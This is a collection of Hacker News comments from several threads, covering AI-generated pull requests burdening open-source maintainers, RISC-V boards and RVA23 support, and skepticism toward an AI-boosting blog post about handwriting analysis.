a wise person would just ignore such PRs and not engage, but then again, a wise person might not do work for rich, giant institutions for free, i mean, maintain OSS plotting libraries.


So what’s the alternative to OSS libraries, Captain Wisdom?


we live in a crazy time where 9 of every 10 new repos posted to GitHub contain some sort of newly authored solution to nearly everything, without importing dependencies. i don't think those are good solutions, but nonetheless, it's happening.

this is a very interesting conversation actually, i think LLMs satisfy the actual demand that OSS satisfies, which is software that costs nothing, and if you think about that deeply there's all sorts of interesting ways that you could spend less time maintaining libraries for other people to not pay you for them.


To understand why it's happening, just read the downvoted comments siding with the slanderer, here and in the previous thread.

Some people feel they're entitled to being open-source contributors, entitled to maintainers' time. They don't understand why the maintainers aren't bending over backwards to accommodate them. They feel they're being unfairly gatekept out of open-source for no reason.

This sentiment existed before AI and it wasn't uncommon even here on Hacker News. Now these people have a tool that allows them to put in even less effort to cause even more headache for the maintainers.

I hope open-source survives this somehow.


As far as I know, there's still no real RISC-V equivalent to Raspberry Pi, and I think that's what early adopters want the most.

The closest thing is probably the Orange Pi RV2, but it has an outdated SoC with no RVA23 support, meaning some Linux distros won't even run on it. Its performance is also much poorer than the RPi5's.


> it has an outdated SoC with no RVA23 support

There are zero SoCs currently available to buy with RVA23 support, so that's not a mark against the RV2 if you want to buy a machine today.

Initial RVA23 machines available later this year are also likely to cost at least 5x to 10x more.

> meaning some Linux distros won't even run on it

There is currently no other hardware you could buy instead that will run that distro.

Check back in April or so, when Ubuntu 26.04 is actually officially released.

NB I'm currently using Ubuntu 26.04 on RVA23 hardware, but it is remote ssh access to a test board at the manufacturer.


Milk-V Titan is a Mini-ITX RISC-V board that has support for UEFI with ACPI and SMBIOS, 1x M key PCIe Gen4 x16 slot with GPU support, 2x USB Type-C (though unfortunately not USB-C PD), and a 12V DC barrel jack.

What is the difference in performance?

Titan hw docs: https://milkv.io/docs/titan/getting-started/hardware

To add a Pi-style 2x20-pin (IDE ribbon cable) interface: add a USB-to-2x20-pin board, or use an RP2040/RP2350 (Pi Pico with uf2 bootloader) over serial over USB, Bluetooth, or WiFi; https://news.ycombinator.com/item?id=38007967


The SpacemiT K3 with 8 SpacemiT X100 RVA23 cores, which are faster than Pi4 but slower than Pi5, should be available in a couple of months:

geekbench: https://browser.geekbench.com/v6/cpu/16145076

rvv-bench: https://camel-cdr.github.io/rvv-bench-results/spacemit_x100/...

There are also 8 additional SpacemiT-A100 cores with 1024-bit wide vectors, which are more like an additional accelerator for number crunching.

The Milk-V Titan has slightly faster scalar performance than the K3.


> faster than Pi4 but slower than Pi5

It may actually be faster than a Pi5.

The benchmark is well tuned for ARM64 but not so well adapted to RISC-V, especially the vector extensions.

You may still be right of course. The SpacemiT K3 is exciting because it may still be the first RVA23 hardware, but it is not exactly going to launch a RISC-V laptop industry.


There isn't much to tune in some, e.g. the clang benchmark. We know that many of the benchmarks already have RVV support (compare BPI-F3 results between versions) and three are still missing RVV support. I think the optimized score would be in the 500s, but that's still a lot lower than Pi5.


> The Milk-V Titan has slightly faster scalar performance than the K3.

So the main difference between this Milk-V Titan and the upcoming SpacemiT K3 is that the latter has better vector performance?


The Titan has no SIMD/Vector support at all, so it doesn't support RVA23.


The K3 is able to run RVA23 code, the Titan is not; it lacks V.

It matters, as the ecosystem settled on RVA23 as the baseline for application processors.


Well, today it is only Ubuntu 25.10 and newer that require RVA23. Almost everything else will run on plain old RV64GC which this board handles no problem.

But you are correct that once RVA23 chips begin to appear, everybody will move to it quite quickly.

RVA23 provides essentially the same feature-set as ARM64 or x86-64v4 including both virtualization and vector capabilities. In other words, RVA23 is the first RISC-V profile to match what modern applications and workflows require.

The good news is that I expect this to remain the minimum profile for quite a long time. Even once RVA30 and future profiles appear, there may not be much pressure for things like Linux distributions to drop support for RVA23. This is a lot like the modern x86-64 space where almost all Linux distributions work just fine on x86-64 v1 even though there are now v2, v3, and v4 available as well. You can run the latest edition of Arch Linux on hardware from 2005. It is hard to predict the future but it would not surprise me if Ubuntu 30.04 LTS ran just fine on RISC-V hardware released later this year.

But ya, anything before RVA23, like the RVA22 Titan we are discussing here, will be stuck forever on older distros or custom builds (like Ubuntu 25.04).


> As far as I know, there's still no real RISC-V equivalent to Raspberry Pi

The SpaceMIT K3 is rumored to be announced at FOSDEM (January 31, 2026)

https://www.reddit.com/r/RISCV/comments/1qdvw4l/k3_x100_a100...

Also at FOSDEM, mainline support for Orange Pi RV2 https://fosdem.org/2026/schedule/event/VF9CHG-mainline-suppo...


DeepComputing has announced a SpacemiT K3 based Framework laptop mainboard.

https://deepcomputing.io/dc-roma-risc-v-mainboard-iii-unveil...



I'm not even sure it's just instruction support that's the problem with the RV2. I bought one since I thought it would be cool to write a bare-metal OS for it (especially after I found the AI results to be so bad). But the lack of documentation has been making it very hard to get anything actually up and running. The best I've got is compiling their custom u-boot and linux repos, and even those come with some problems.


I have been disappointed with Orange Pi hardware, I am not surprised.

Seldom does an SBC vendor want to actually support their products. You get the distro they made at launch, that is it. They do no updates or support. They just want to sell an overpriced chipset with a fucked and unwieldy boot sequence.

Same thing with all the Android devices. Pick a version of Android that you like because that's what you'll have on it forever.



My Pixel has gotten a couple major Android version bumps.


I’d also like an updated RISC-V Framework laptop board. There is one but it’s too limited. If they came out with that I’d try it as a laptop.

I mean a board with decent storage and better performance.


Did you paste the wrong link? While the OP of that thread was accused of using LLMs, the thread doesn't really match what the article describes.

I think this one is a much closer fit: https://news.ycombinator.com/item?id=46661308


I find it worrying that this was upvoted so much so quickly, and HN users are apparently unable to spot the glaring red flags about this article.

1. Let's start with where the post was published. Check what kind of content this blog publishes - huge volumes of random low-effort AI-boosting posts with AI-generated images. This isn't a blog about history or linguistics.

2. The author is anonymous.

3. The contents of the post itself: it's just raw AI output. There's no expert commentary. It just mentions that unnamed experts were unable to do the job.

This isn't to say that LLMs aren't useful for science; on the contrary. See for example Terence Tao's blog. Notice how different his work is from whatever this post is.


I'm especially suspicious of the handwriting analysis. It seems like the kind of thing a vision LLM would be pretty bad at doing and very good at convincingly faking for non-experts.

Gemini 3 Pro, eg, fails very badly at reading the Braille in this image, confusing the English language text for the actual Braille. When you give it just the Braille, it still fails and confidently hallucinates a transcription badly enough that you don't even have to know Braille (I don't!) to see it's wrong.

https://m.facebook.com/groups/dullmensclub/posts/18885933484...

As far as I can tell, Gemini 3 Pro is still completely out of its depth and incapable of understanding Braille at all, and doesn't realize this.


Given how quickly it got upvoted, I also wonder how much of the upvoting itself may be from AI bots.


My first reflex when I see anything “solved” by AI is to go straight to the comments. This time again, I was not disappointed.


I feel sorry for people having to read the internet without the HN comments


That was said about Reddit some years ago, and now Reddit is clearly riddled with astroturfing and other manipulation. We don't know how big the problem on HN already is or how bad it will get. But it would be naive to think that it doesn't happen here.


True. Sometimes weird links with very few upvotes magically end up in the top 10. But the comments usually bring them back to earth!

The most real benefit of HN vs Reddit is commenters who are actually knowledgeable in that field, who leave a comment or vote up an actually useful comment.


You are anonymous too, so…


I am not announcing a scientific breakthrough.


Happens too often these days. Also, express an unpopular opinion and get downvoted.


In hindsight, one possible reason to bet on November 18 was the deprecation date of older models: https://www.reddit.com/r/singularity/comments/1oom1lq/google...

